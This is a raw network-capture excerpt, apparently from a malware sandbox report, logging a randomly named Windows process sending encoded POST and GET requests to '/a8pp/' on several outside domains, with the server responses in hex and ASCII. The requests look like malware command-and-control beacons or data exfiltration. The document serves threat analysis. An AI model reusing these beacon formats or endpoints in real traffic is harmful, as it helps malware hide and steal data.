                                        Jun 4, 2024 14:36:14.025161982 CEST1289INData Raw: 31 30 30 30 0d 0a 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3a 73 6b 65 74 63 68 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f
                                        Data Ascii: 1000nk="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns"> <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage"> <g id="temporary-errors" sketch:t
                                        Jun 4, 2024 14:36:14.025274992 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 37 31 2e 31 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 46 69 6c 6c 2d 36 22 20 66 69 6c 6c 3d
                                        Data Ascii: <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Fill-6" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2"
                                        Jun 4, 2024 14:36:14.025302887 CEST1289INData Raw: 37 33 35 38 20 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 4c 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 5a 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 38 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34
                                        Data Ascii: 7358 148.418266,42.6138113 L148.418266,42.6138113 Z" id="Stroke-8" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill
                                        Jun 4, 2024 14:36:14.025360107 CEST237INData Raw: 31 31 33 2e 36 32 34 31 35 31 20 43 38 32 2e 39 33 30 34 38 36 31 2c 31 30 38 2e 35 39 30 39 34 33 20 38 30 2e 33 38 35 38 38 32 34 2c 31 30 36 2e 30 33 39 30 31 39 20 37 36 2e 39 39 37 38 32 33 35 2c 31 30 36 2e 30 33 39 30 31 39 20 43 37 34 2e
                                        Data Ascii: 113.624151 C82.9304861,108.590943 80.3858824,106.039019 76.9978235,106.039019 C74.3474489,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.945962
                                        Jun 4, 2024 14:36:14.029934883 CEST1289INData Raw: 66 66 61 0d 0a 36 33 2e 32 36 35 32 33 35 33 2c 31 31 32 2e 39 37 34 31 31 33 20 36 32 2e 31 30 37 31 37 39 36 2c 31 31 31 2e 30 36 36 37 39 32 20 43 36 31 2e 38 38 32 37 35 35 34 2c 31 31 30 2e 36 39 37 32 38 33 20 36 31 2e 36 36 31 37 32 31 34
                                        Data Ascii: ffa63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.4420433,109.993585 C60.9314954,109.202943 60.7992817,108.364075 61.0494706,107.500755 C61.7539319,105.073811 65.3128514,103.209962 66.1291858,102.
                                        Jun 4, 2024 14:36:14.030011892 CEST1289INData Raw: 34 39 31 20 39 34 2e 30 35 34 37 33 36 38 2c 31 33 33 2e 35 34 39 31 33 32 20 38 38 2e 34 30 30 30 36 31 39 2c 31 34 31 2e 38 33 32 35 32 38 20 43 38 32 2e 38 38 37 37 37 30 39 2c 31 34 39 2e 39 30 38 30 37 35 20 37 33 2e 32 36 31 39 34 31 32 2c
                                        Data Ascii: 491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.1859659,153.840226 53.4271858,153.633736 51.8040093,153.6
                                        Jun 4, 2024 14:36:14.030025005 CEST1289INData Raw: 30 2e 31 33 30 39 34 37 34 2c 31 34 35 2e 37 37 33 35 30 39 20 38 38 2e 38 38 36 32 30 31 32 2c 31 32 35 2e 39 31 33 30 35 37 20 38 34 2e 38 37 39 31 31 31 35 2c 31 31 33 2e 35 31 38 38 36 38 20 43 38 32 2e 38 37 38 39 35 36 37 2c 31 30 37 2e 33
                                        Data Ascii: 0.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330943 79.7465108,105.699396 76.9978235,105.699396 C73.9284334,105.699396 71.3377245,107.735094 71.3377245,107.735094 C69.1972198,112.892604 67.525904,114.60634 6


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.11.304982123.227.38.74807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:16.431338072 CEST1685OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 6f 49 78 44 41 45 4e 56 36 49 56 7a 48 67 6e 56 67 57 66 34 33 4b 42 4c 36 47 35 6a 61 59 62 66 75 32 79 42 7a 6d 4f 45 4e 39 63 61 6c 72 43 31 74 4a 63 50 48 4c 57 4f 62 55 42 73 46 36 59 44 44 64 44 70 34 37 2f 49 67 68 4b 52 42 34 74 6d 41 58 78 71 38 69 69 75 2b 4f 47 6e 4e 57 7a 45 39 4f 56 6f 48 37 58 71 76 2f 56 63 73 63 52 48 66 65 47 71 31 45 48 63 55 67 30 6a 71 6f 42 54 36 48 47 49 37 54 50 4c 55 50 59 53 35 36 61 48 42 4b 4e 46 74 43 73 73 71 44 63 34 59 32 61 4a 71 67 33 2b 32 41 4c 31 65 6f 77 73 43 36 48 43 6c 53 72 74 6b 36 62 5a 64 32 4a 43 79 37 4e 68 6f 2b 43 41 6b 46 50 73 41 68 6f 78 49 74 2b 35 50 63 64 53 50 41 74 53 58 78 5a 44 44 61 74 33 4a 64 46 6c 50 67 48 2b 68 59 38 7a 36 72 43 6c 30 7a 52 34 71 70 4d 78 70 65 49 59 78 48 6b 70 2b 51 6f 5a 6e 74 7a 58 35 69 34 58 38 6d 6c 77 61 4e 6c 69 65 74 4b 45 72 67 75 4b 62 6d 66 31 30 68 6d 52 6f 54 37 56 62 33 65 52 76 5a 6d 50 59 41 71 58 59 2f 33 54 38 44 65 72 50 6a 30 34 31 61 70 6f 72 54 51 49 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVzHgnVgWf43KBL6G5jaYbfu2yBzmOEN9calrC1tJcPHLWObUBsF6YDDdDp47/IghKRB4tmAXxq8iiu+OGnNWzE9OVoH7Xqv/VcscRHfeGq1EHcUg0jqoBT6HGI7TPLUPYS56aHBKNFtCssqDc4Y2aJqg3+2AL1eowsC6HClSrtk6bZd2JCy7Nho+CAkFPsAhoxIt+5PcdSPAtSXxZDDat3JdFlPgH+hY8z6rCl0zR4qpMxpeIYxHkp+QoZntzX5i4X8mlwaNlietKErguKbmf10hmRoT7Vb3eRvZmPYAqXY/3T8DerPj041aporTQIuJVSGOV4C3M9HXh3WO4bUUP8n0XtRqUwkT5aV7gO8uxkas3NTqpf8APAoj2SA/swPHUfQ1LqUnmK9SnBveOOetT16GeffecKNQ7kSJorXzwCAK3TLUvjJ+aXaTMdxuSkOVOIx/ox8T6sXkpdOd+KoqV+7raaOui4MIJwLNcVJf6tu1r/r5AqcdO0PEYYCoaVgy3Ioqwq3CcBJ1JAGnl0Gnwwm9wHaV3sgsmbCIh01LAsXjQ60pKjnOMRKEX7zRgAtzvdy1cZmTm39o77av40ZXFhWuZ0FPfEttSlT/4ItFn75aD76bGPeNDAk6jscr4c1SRslG1G2ggAnOIfvKU6t2S9ontp2Mgp5XYwhYXvdcqmRB7PjNJfI5Jh8yE/C7Gcwp3jJGZUUcG8ebA2w2MVC/rHhS+OSKqekrUj4+NfCB/x+0AzZyKIBRoJbHi41C3VubgIxk5XLsCKauzbh+RzzrS0UZX1ar8E8/XAbNM447Ya/32/z2j44NeoKR4ElOVRj70nJ21/VD6IFw6CYaFkhuEgFMScLNf6Ctty2PQaNXrv7ELOfmQ/dbO8rFBzXn/Ur7OVlC9H2GEVoAcAa3poZpsXbquvgk7pA004CTihJDUPnCdLlcGJpAbE06br/oM/bGa8z/xfqgrBy1QCEkRwYzH0cTZ/f/f2yf [TRUNCATED]
                                        Jun 4, 2024 14:36:16.653022051 CEST1289INHTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:36:16 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: 4e892528-c72c-4cf7-adb0-67afafff1779-1717504576
                                        server-timing: processing;dur=12
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4e892528-c72c-4cf7-adb0-67afafff1779-1717504576
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4e892528-c72c-4cf7-adb0-67afafff1779-1717504576
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QvfOlITAkf4yMo7Na5reTc2jIKWoyFeaAnwzTm%2FDrwYjrHORkzB3V%2BF4Rm7OfxeNeU9Ekn8DjF6Xpt%2BSms98FgqWvRxqvJkHQmkiod19JUSGQSO%2Fzrjtbm2JNmMi
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:36:16.653033972 CEST262INData Raw: 77 36 62 25 32 42 56 44 6a 25 32 46 49 66 4c 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74
                                        Data Ascii: w6b%2BVDj%2FIfLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=90.999842Server: cloudflareCF-RAY: 88e7f7b32a458dc0-MIAalt-svc: h3="
                                        Jun 4, 2024 14:36:16.653093100 CEST1289INData Raw: 39 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f 6d
                                        Data Ascii: 95f<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-
                                        Jun 4, 2024 14:36:16.653104067 CEST1117INData Raw: 77 72 61 70 70 65 72 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 20 20
                                        Data Ascii: wrapper { min-width:320px; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; }
                                        Jun 4, 2024 14:36:16.655949116 CEST1289INData Raw: 66 66 61 0d 0a 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3a 73 6b 65 74 63 68 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f
                                        Data Ascii: ffaink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns"> <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage"> <g id="temporary-errors" sketch:t
                                        Jun 4, 2024 14:36:16.656069994 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 37 31 2e 31 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 46 69 6c 6c 2d 36 22 20 66 69 6c 6c 3d
                                        Data Ascii: <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Fill-6" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2"
                                        Jun 4, 2024 14:36:16.656095028 CEST1289INData Raw: 37 33 35 38 20 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 4c 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 5a 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 38 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34
                                        Data Ascii: 7358 148.418266,42.6138113 L148.418266,42.6138113 Z" id="Stroke-8" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill
                                        Jun 4, 2024 14:36:16.656105995 CEST230INData Raw: 31 31 33 2e 36 32 34 31 35 31 20 43 38 32 2e 39 33 30 34 38 36 31 2c 31 30 38 2e 35 39 30 39 34 33 20 38 30 2e 33 38 35 38 38 32 34 2c 31 30 36 2e 30 33 39 30 31 39 20 37 36 2e 39 39 37 38 32 33 35 2c 31 30 36 2e 30 33 39 30 31 39 20 43 37 34 2e
                                        Data Ascii: 113.624151 C82.9304861,108.590943 80.3858824,106.039019 76.9978235,106.039019 C74.3474489,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.
                                        Jun 4, 2024 14:36:16.656114101 CEST11INData Raw: 36 0d 0a 39 34 35 39 36 32 0d 0a
                                        Data Ascii: 6945962
                                        Jun 4, 2024 14:36:16.662465096 CEST1289INData Raw: 31 30 30 30 0d 0a 20 36 33 2e 32 36 35 32 33 35 33 2c 31 31 32 2e 39 37 34 31 31 33 20 36 32 2e 31 30 37 31 37 39 36 2c 31 31 31 2e 30 36 36 37 39 32 20 43 36 31 2e 38 38 32 37 35 35 34 2c 31 31 30 2e 36 39 37 32 38 33 20 36 31 2e 36 36 31 37 32
                                        Data Ascii: 1000 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.4420433,109.993585 C60.9314954,109.202943 60.7992817,108.364075 61.0494706,107.500755 C61.7539319,105.073811 65.3128514,103.209962 66.1291858,10
                                        Jun 4, 2024 14:36:16.662569046 CEST1289INData Raw: 30 32 34 39 31 20 39 34 2e 30 35 34 37 33 36 38 2c 31 33 33 2e 35 34 39 31 33 32 20 38 38 2e 34 30 30 30 36 31 39 2c 31 34 31 2e 38 33 32 35 32 38 20 43 38 32 2e 38 38 37 37 37 30 39 2c 31 34 39 2e 39 30 38 30 37 35 20 37 33 2e 32 36 31 39 34 31
                                        Data Ascii: 02491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.1859659,153.840226 53.4271858,153.633736 51.8040093,153


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.11.304982223.227.38.74807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:19.073797941 CEST471OUTGET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:19.361792088 CEST1289INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:36:19 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        X-Storefront-Renderer-Rendered: 1
                                        location: https://www.shootprecious.com/a8pp?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL
                                        x-redirect-reason: https_required
                                        x-frame-options: DENY
                                        content-security-policy: frame-ancestors 'none';
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        vary: Accept
                                        powered-by: Shopify
                                        server-timing: processing;dur=14;desc="gc:2", db;dur=3, asn;desc="60068", edge;desc="ATL", country;desc="US", pageType;desc="404", servedBy;desc="qxt5", requestID;desc="f084c02e-1770-449e-94ab-9398108dfffc-1717504579"
                                        x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                        x-request-id: f084c02e-1770-449e-94ab-9398108dfffc-1717504579
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95wQlJXHfWwnrxkh6eIvqBpWzsvOSn8uSWk%2BOgBZkc3YRJ%2FvPlPovJTCN7sFjAdd7n%2BQX2MyW%2BfcXit1iU3UD88rM0JFwEyzf5VO%2BEiBBdqSxjrXHa5JWdkl8lGGPAJS7tsAEsG5ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:36:19.361805916 CEST297INData Raw: 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 31 36 39 2e 30 30 30 31 34 39 0d 0a 58 2d
                                        Data Ascii: o":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=169.000149X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY:
                                        Jun 4, 2024 14:36:19.361848116 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.11.3049823217.70.184.50807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:25.075710058 CEST763OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 6f 64 58 6a 32 73 56 2f 61 54 47 52 6a 63 45 4c 79 41 46 2b 4b 32 55 47 62 30 72 33 44 41 4d 4d 32 50 56 35 36 32 63 4f 4d 63 55 5a 73 55 6f 2b 73 51 51 37 72 51 63 56 54 7a 30 75 6c 39 50 37 33 63 48 48 41 6f 56 48 72 46 54 79 49 43 52 47 63 59 68 66 76 67 4d 74 2f 63 4b 6d 50 75 32 71 57 33 56 71 34 73 71 50 38 4d 6f 49 76 43 75 31 6f 74 57 6f 48 79 43 46 6c 76 32 72 34 7a 56 34 36 39 74 39 75 51 76 49 35 6d 2b 66 36 50 34 4d 4e 73 6a 48 41 78 52 70 6f 56 74 78 72 4e 43 64 4e 77 61 52 68 64 4e 4b 2b 61 6b 4d 57 7a 56 34 51 51 31 2b 36 74 34 62 31 5a 4e 35 47 49 62 55 41 3d 3d
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGRjcELyAF+K2UGb0r3DAMM2PV562cOMcUZsUo+sQQ7rQcVTz0ul9P73cHHAoVHrFTyICRGcYhfvgMt/cKmPu2qW3Vq4sqP8MoIvCu1otWoHyCFlv2r4zV469t9uQvI5m+f6P4MNsjHAxRpoVtxrNCdNwaRhdNK+akMWzV4QQ1+6t4b1ZN5GIbUA==
                                        Jun 4, 2024 14:36:25.285891056 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:25 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.11.3049824217.70.184.50807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:27.823105097 CEST783OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 6f 64 58 6a 32 73 56 2f 61 54 47 54 44 73 45 59 46 63 46 31 4b 32 62 4b 37 30 72 39 6a 41 41 4d 32 44 56 35 34 61 79 4a 2b 34 55 5a 4e 6b 6f 2f 74 51 51 38 72 51 63 48 7a 7a 74 6a 46 39 36 37 77 56 79 48 41 55 56 48 76 74 54 79 4a 79 52 48 72 4d 2b 65 2f 67 43 32 76 63 49 6f 76 75 32 71 57 33 56 71 34 35 78 50 38 55 6f 49 61 4b 75 31 4e 42 56 6c 6e 79 44 47 6c 76 32 39 49 7a 72 34 36 38 4f 39 71 59 46 49 36 4f 2b 66 2f 7a 34 4c 5a 77 6b 4a 77 78 54 33 59 55 31 30 65 52 48 46 5a 63 51 41 6a 74 64 43 4e 57 45 41 68 43 50 6c 54 6b 33 74 61 52 56 48 30 30 6c 37 45 4a 41 4a 42 52 4a 2b 43 30 58 58 62 39 51 74 36 61 4c 51 6d 65 67 42 74 59 3d
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGTDsEYFcF1K2bK70r9jAAM2DV54ayJ+4UZNko/tQQ8rQcHzztjF967wVyHAUVHvtTyJyRHrM+e/gC2vcIovu2qW3Vq45xP8UoIaKu1NBVlnyDGlv29Izr468O9qYFI6O+f/z4LZwkJwxT3YU10eRHFZcQAjtdCNWEAhCPlTk3taRVH00l7EJAJBRJ+C0XXb9Qt6aLQmegBtY=
                                        Jun 4, 2024 14:36:28.037385941 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:27 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
